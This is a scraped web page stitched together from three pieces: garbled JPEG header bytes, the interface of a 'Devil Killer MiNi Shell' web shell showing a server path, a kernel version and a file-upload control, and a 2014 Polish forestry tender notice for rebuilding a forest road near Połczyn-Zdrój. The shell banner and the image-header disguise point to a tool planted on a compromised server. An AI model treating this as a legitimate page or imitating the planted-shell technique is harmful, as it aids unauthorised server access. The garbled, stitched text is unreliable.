JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140718/241546-N-2014.html

<p class="kh_header"><b>Połczyn-Zdrój: Przebudowa drogi leśnej nr 202 w L. Krosino - etap II</b><br>
<b>Numer ogłoszenia: 241546 - 2014; data zamieszczenia: 18.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Połczyn , ul. 15 Grudnia 12, 78-320 Połczyn-Zdrój, woj. zachodniopomorskie, tel. 094 3662230, faks 094 3662230.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.polczyn.szczecinek.lasy.gov.pl/web/polczyn</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: PGL Lasy Państwowe Nadleśnictwo Połczyn.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi leśnej nr 202 w L. Krosino - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na przebudowie 1,396 km drogi leśnej nr 202 w Leśnictwie Krosino
Odcinek od km 0+735 do km 2+131

Stan istniejący:
Trasa drogi przebiega w istniejącym pasie ograniczonym drzewostanem, na terenie Nadleśnictwa Połczyn na działkach ewidencyjnych o następujących numerach: 16, 22/1, 23/1, 23/2 13/5 obręb Krosino, 10/1, 11 obręb Wielanowo, Gmina Grzmiąca.
Droga zaczyna się dowiązaniem do granicy przebudowywanego w 2013 roku odcinka danej drogi leśnej a kończy dowiązaniem do krawędzi drogi leśnej w oddz. 22. Droga posiada w swoim śladzie szerokość zmienną w granicach 3,00 m. Jest zadarniona, skoleinowana, nierówna z poboczami wyniesionymi, zadarnionymi. W ciągu drogi leśnej lokalnie występują rowy jednostronne lub obustronne w stanie kwalifikującym je do przebudowy. W związku ze złym stanem drogi oraz brakiem odpowiedniego odwodnienia spływ wód opadowych jest utrudniony co sprzyja powstawania zastoisk wodnych i złemu odwodnienia korpusu drogi. Wzdłuż drogi zlokalizowany jest przepust O 600 mm oraz obiekt mostowy w bardzo dobrym stanie technicznym.
Droga leży w terenie równinnym ze zmiennym łagodnym nachyleniem podłużnym. Istniejący pas drogowy jest wąski, jego szerokość nie pozwala na poprawne przeprowadzenie geometrii drogi z uwagi na parametry techniczne dróg pożarowych. W ciągu drogi leśnej zlokalizowane są zjazdy i skrzyżowania z innymi drogami. Brak jest mijanek i składnic na drewno.
Teren drogi leśnej jak i jej okolica jest ogólnie podmokły i z uwagi na zalegające grunty może mieć istotny wpływ na odpływ wód opadowych. 
Długość całkowita drogi wynosi 2,1 km. Spadki podłużne istniejącego terenu wahają się od 0,200% do 2,200% zmiennie na całej długości drogi. Brak mijanek, zjazdów i skrzyżowań o nawierzchni utwardzonej oraz częściowo nie zachowany warunek minimalnej skrajni drogowej pomiędzy koronami drzew powoduje utrudnienia w ruchu pojazdów.
Ogólnie droga wymaga kompleksowej odbudowy z dostosowaniem do obowiązujących przepisów.


Parametry techniczne projektowanej drogi:
prędkość projektowa Vmax = 30 km/h,
obciążenie ruchem KR2 - 120 kN,
ładowność 28 Mg,
nacisk osi z ładunkiem 69 - 190 kN,
szerokość korony drogi 5,00 m,
szerokość jezdni 3,50 m,
przekrój daszkowy 3,0%,
szerokość poboczy 2 x 0,75 m,
spadek poprzeczny poboczy 6,0%,
szerokość zjazdów leśnych 3,00 m,
promienie wyokrąglające na zjazdach leśnych 6,00 m, 
szerokość wlotów skrzyżowań 3,50 m,
promienie wyokrąglające łuki na skrzyżowaniach 11,00 m,
mijanki szerokość 2,50 m, długości 23,00 m ze skosami wjazdowymi 1:8.

Plan sytuacyjny/geometria korpusu drogi
Objęta opracowaniem droga leśna ma długość L=2 131 m, odcinek podlegający przebudowie 1 396 m. Drogę zaprojektowano po trasie jej dotychczasowego przebiegu, dokonując nieznacznych korekt w miejscach załamań osi trasy oraz występowania łuków poziomych. Trasę wyznaczono na podstawie mapy do celów projektowych oraz na podstawie wizji i pomiarów własnych w terenie. W ciągu drogi leśnej zaprojektowano poszerzenia jezdnia na łukach poziomych o parametrach według tabeli na rys. nr 3 Przekroje normalne. Zaprojektowano proste przejściowe przed łukami poziomymi długości 25 m. Załamania trasy opisano w układzie współrzędnych i oznaczono odpowiednio od W1 do W27. Wzdłuż drogi zaprojektowano skrzyżowania, zjazdy, mijanki o parametrach jak wyżej. Projektowaną geometrię drogi przedstawiono na załączonych planach sytuacyjnych. 
Roboty ziemne związane z modernizacją polegać będą na zebraniu warstwy humusu, oraz wykonaniu wykopów i nasypów z gruntu pozyskanego w trakcie wykonywania robót, podłużnym i poprzecznym zniwelowaniu i wyprofilowaniu terenu oraz wykonaniu poszczególnych warstw konstrukcyjnych nawierzchni.

Na całości projektowanej drogi przyjęto następujące wykonanie robót przygotowawczych:
mechaniczne oczyszczenie nawierzchni z naniesionej ziemi oraz profilowanie istniejącej nawierzchni,
usunięcie naniesionych zanieczyszczeń przez wodę, wyrównanie nierówności i zasypanie wybojów celem uzyskania prawidłowego profilu poprzecznego istniejącej nawierzchni, która stanowić będzie podbudowę pod projektowaną nawierzchnię.



Profil podłużny drogi/ rozwiązania wysokościowe
Niweletę sporządzono o pomiary własne wykonane w terenie. Niweletę nawiązano do istniejącego poziomu terenu unosząc ją ponad istniejący teren. Projektowane spadki podłużne wąchają się w granicach od 0,313% do 3,555% .

Konstrukcja nawierzchni:
Przyjęto konstrukcję nawierzchni drogi,placu manewrowego,zjazdów,skrzyżowań,
mijanek o następujących warstwach:
warstwa górna - kruszywo łamane stabilizowane mechanicznie 0/31,5 mm wraz z warstwą klinującą z klińca 5/20 mm w ilości 50kg/m2 gr. 10 cm,
warstwa dolna - kruszywo łamane stabilizowane mechanicznie 31,5/63 mm gr. 20 cm,
warstwa odcinająca - pospółka gr. 10 cm.
Grubość całkowita konstrukcji = 40 cm
Pobocza szerokości 0,75 m zaprojektowano z pospółki gr. 10 cm.
Skarpy rowu umocnić warstwa humusu 10 cm (materiał pozyskany ze zdjęcia humusu).

UWAGA: 
Do wykonania nasypów zastosować materiał z wykopów. 
Dobór warstw konstrukcyjnych dokonano na podstawie założeń z Inwestorem.
Materiał z wykopów oprócz wykorzystania w nasypach zastosować do zasypania miejsc po karpach.
Materiał ze zdjęcia humusu wykorzystać przy humusowaniu skarp i nasypów grubości 10 cm. Pozostały rozplantować poza pasem drogowym.
Szczegóły dotyczące konstrukcji jezdni przedstawiono w części rysunkowej projektu.

Odwodnienie:
Powierzchniowe odwodnienie korony drogi zapewniają spadki poprzeczne i podłużne jezdni, skrzyżowań, mijanek, składnic. Wody opadowe odprowadzone z jezdni, zjazdów, skrzyżowań, mijanek zostaną przez projektowane pobocza szerokości 0,75 m do projektowanych rowów przydrożnych prostokątnych szerokości zmiennej (zależna od istniejącego terenu) o głębokości min. 40 cm od rzędnej terenu z dnem rowu szerokości 40 cm. Dodatkowo zaprojektowano przedłużenie istniejącego przepustu o 2 m z rur AROT O 600 mm ze ściankami czołowymi obłożonymi kamieniem na podsypce cementowo-piaskowej gr. 10 cm.


Szczegółowy opis przedmiotu zamówienia przedstawia poniżej wymieniona dokumentacja techniczna
stanowiąca załączniki do SIWZ:
- projekt wykonawczy;
- przedmiar;
- specyfikacja techniczna wykonania i odbioru robót.

Załączone dokumenty - przedmiar robót oraz kosztorys ofertowy mają charakter pomocniczy przy 
sporządzaniu oferty.
Wykonawca zobowiązany będzie w ramach zaoferowanej ceny do wykonania wszelkich robót 
wynikających z dokumentacji projektowej oraz STWiOR.
Wykonawca do formularza oferty jest zobowiązany dołączyć kosztorys ofertowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień w rozumieniu art. 67 ust.1 pkt 6 ustawy Pzp. Ewentualne zamówienia uzupełniające przewiduje się dla wszystkich pozycji kosztorysowych ujętych w kosztorysie ofertowym.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.26-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium.
Wadium musi być wniesione zgodnie z art. 45 ust. 6 ustawy PZP przed upływem terminu składania ofert.

Zamawiający żąda wniesienia wadium w wysokości: 10 000,00 (słownie: dziesięć tysięcy złotych 00/100) 
	
Wadium może być wnoszone w jednej lub kilku następujących formach, według wyboru Wykonawcy:
a)	 pieniądzu;
b)	 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej z tym że poręczenie kasy jest zawsze poręczeniem pieniężny;
c)	 gwarancjach bankowych;
d)	 gwarancjach ubezpieczeniowych;
e)	 poręczeniach udzielonych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007, Nr 42 poz. 275 ze zm.)

Wadium powinno być wniesione na cały okres terminu związania ofertą.

Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego 
BGŻ Szczecinek Nr rachunku: 24 2030 0045 1110 0000 0033 0540

z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy. Należy dołączyć do oferty kserokopię dowodu przelewu, potwierdzoną za zgodność z oryginałem. Wadium wnoszone w formie pieniądza musi się znaleźć na rachunku bankowym Zamawiającego najpóźniej do dnia 01.08.2014 r. godz. 8:00

W przypadku wniesienia wadium w formie gwarancji lub poręczenia koniecznym jest aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 46 ust. 4a i 5 ustawy Pzp . Wykonawcy wnoszący wadium powinni zawsze podawać numer sprawy (przetargu) oraz nazwę zamówienia.

W przypadku wniesienia wadium w formie gwarancji lub poręczeń Beneficjentem jest: Skarb Państwa - Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Połczyn, ul. 15 Grudnia 12, 78-320 Połczyn- Zdrój.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonania oceny spełniania warunków  w tym zakresie.
Zamawiający uzna warunek udziału w postępowaniu za spełniony, jeżeli Wykonawca załączy do oferty oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy Prawo zamówień publicznych (wg wzoru - załącznik nr 1 SIWZ).

Ocena powyższego warunku odbywać się będzie na podstawie przedłożonego oświadczenia, którego wzór stanowi załącznik nr 1 SIWZ.
Ocena warunku nastąpi na zasadzie kryterium spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek udziału w postępowaniu za pełniony, jeżeli:

Wykonawca ubiegający się o udzielenie zamówienia wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał (zakończył)  co najmniej trzy (3) roboty budowlane polegające na budowie, przebudowie, remoncie dróg leśnych lub innych o wartości nie mniejszej niż 200 tys. zł brutto każda z m.in. kruszywa budowlanego, kruszywa naturalnego, łamanego lub tzw. płyt JUMBO.
W celu potwierdzenia spełnienia w/w warunku Wykonawca zobowiązany jest przedłożyć wykaz (min. 3 robót) robot budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania (sporządzony wg wzoru stanowiącego załącznik nr 2 SIWZ) oraz z załączeniem dowodów, określających, czy roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 


Dowodami, o których mowa są:
a) poświadczenia,
b) inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w sranie uzyskać poświadczenia.

W przypadku gdy Zamawiający (Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Połczyn) jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie robót budowlanych zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów.

Ocena warunku nastąpi na zasadzie kryterium spełnia/ nie spełnia w oparciu o w/w dokumenty.

Jako wykonanie (zakończenie) roboty należy rozumieć co najmniej podpisanie bezusterkowego końcowego protokołu odbioru robót lub równoważnego dokumentu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	 Wykonawca ubiegający się o udzielenie zamówienia powinien wykazać, że dysponuje odpowiednim potencjałem technicznym do wykonywaniu zamówienia:
- koparka min. 0,4 m3 				                                     	                - min. 1 szt
- spycharka min. 55kW (75KM)		                                        - min. 1 szt
- równiarka samojezdna min. 74 kW (100 KM)              - min. 1 szt
- walec statyczny samojezdny min. 10  t                         - min. 1 szt
- walec wibracyjny samojezdny min. 7.5 t                      - min. 1 szt
- samochód dostawczy min. 0.9 t 		                                     - min. 1 szt
- samochód samowyładowczy 5 t                                   - min. 1 szt
- samochód skrzyniowy do 3.5 t                                     - min. 1 szt
- rozściełacz	                                                                     - min. 1 szt

Ocena spełnienia warunku udziału w postępowaniu w zakresie dysponowania potencjałem technicznym niezbędnym do wykonania zamówienia odbywać się będzie na podstawie wykazu narzędzi i urządzeń technicznych dostępnych wykonawcy robót budowlanych w celu realizacji zamówienia wraz z informacją dotyczącą parametrów technicznych oraz z informacją o podstawie do dysponowania tymi zasobami (sporządzonego wg wzoru załącznik nr 4 SIWZ). 

Ocena warunku nastąpi na zasadzie kryterium spełnia/ nie spełnia w oparciu o w/w dokumenty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek udziału w postępowaniu za pełniony, jeżeli:
1.	 Wykonawca ubiegający się o udzielenie zamówienia powinien wykazać, że dysponuje następującymi osobami, które będą uczestniczyć w wykonywaniu zamówienia:

a)	 co najmniej jedną (1) osobą do pełnienia funkcji kierownika budowy posiadając posiadającym
stosowne uprawnienia i doświadczenie w nadzorowaniu robót budowlanych o charakterze odpowiadającym przedmiotowi zamówienia.

Wykonawca dostarczy Zamawiającemu dokumenty potwierdzające posiadanie powyższych uprawnień              
oraz aktualne zaświadczenie z okręgowej Izby Inżynierów Budownictwa - przy podpisaniu umowy.

b)	 co najmniej trzema (3) osobami zdolnymi do wykonania przedmiotu zamówienia posiadających uprawnienia do obsługi koparki, spycharki, równiarki lub ciągnika - zgodnie z wykazem maszyn i urządzeń w punkcie 2. poniżej

Ocena spełnienia warunku udziału w postępowaniu w zakresie dysponowania osobami zdolnymi do wykonania zamówienia odbywać się będzie na podstawie wykazu osób (sporządzonego wg wzoru załącznik nr 3 SIWZ) które będą uczestniczyć w wykonywaniu zamówienia wraz z informacją na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz z informacją o podstawie do dysponowania tymi osobami.

Ocena przedmiotowego warunku nastąpi na zasadzie kryterium spełnia/ nie spełnia w oparciu o w/w dokumenty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek udziału w postępowaniu za spełniony, jeżeli Wykonawca:
1.	 wykaże, że posiada środki finansowe lub zdolność kredytową w kwocie co najmniej 300 000,00 zł
(słownie: trzysta tysięcy złotych 00/100).
Ocena przedmiotowego warunku nastąpi na zasadzie kryterium spełnia/ nie spełnia w oparciu o dołączone do oferty dokumenty, tj.  informację z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2.	 posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 200 000,00 zł (słownie: dwieście tysięcy zlotych, 00/100 ). 

Ocena przedmiotowego warunku nastąpi na zasadzie kryterium spełnia/ nie spełnia w oparciu o dołączone do oferty dokumenty, tj.  opłaconej polisy a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.

Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów lub oświadczeń wraz z ofertą zgodnie z formułą: spełnia / nie spełnia.
Z treści złożonych dokumentów musi jednoznacznie wynikać, że Wykonawca spełnia przedmiotowe warunki tj. zgodnie z opisanymi szczegółowo warunkami udziału w pkt. 8 SIWZ. 
Zgodnie z postanowieniami art.26 ust 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając mu w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

Jeżeli Wykonawca wykazując spełnienie warunków o których mowa w art. 22 ust 1 pkt 4 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, zobowiązany jest dołączyć odpowiednie dokumenty, o których mowa w § 1 ust.1 pkt. 10-11 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz.U.2013.231).
Jeżeli Wykonawca wykazując spełnienie warunków o których mowa w art. 22 ust 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, zamawiający w celu oceny czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda dokumentów dotyczących w szczególności:
1)	 zakresu dostępnych Wykonawcy zasobów innych podmiotów;
2)	 sposobu korzystania z zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia
3)	 charakteru stosunku jaki będzie łączył Wykonawcę z innym podmiotem;
4)	 zakresu i okresu udziału innego podmiotu w wykonywaniu zamówienia.

W przypadku, gdy wartości określone w warunkach udziału w postępowaniu w zakresie sytuacji finansowej i ekonomicznej zostaną wyrażone w walutach obcych to do oceny spełnienia warunków zostaną przeliczone na PLN według średniego kursu NBP danej waluty do PLN z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

